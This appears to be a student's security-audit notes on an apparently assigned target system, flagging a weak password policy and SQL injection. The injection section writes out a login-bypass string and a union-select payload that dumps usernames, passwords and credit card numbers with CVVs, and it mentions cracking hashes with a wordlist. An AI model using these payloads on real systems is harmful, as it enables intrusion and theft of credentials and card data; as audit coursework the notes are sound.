mirror of
https://github.com/jackyzha0/quartz.git
synced 2025-12-27 14:54:05 -06:00
814 B
814 B
| title | aliases | tags | ||
|---|---|---|---|---|
| ass01-security-audit |
|
Jet Hughes - 9474308
Summary of system
- function
- technology
Flaws
Password policy
- must have at least 5 characters and one digit.
- not suffiecient
SQL Injection
- can log in to admin using username: " 'or 1=1;--"
- we are able to extract data which is displayed as the users username
- we can extract the data from the data base using this "username"
- ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;--
- I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more.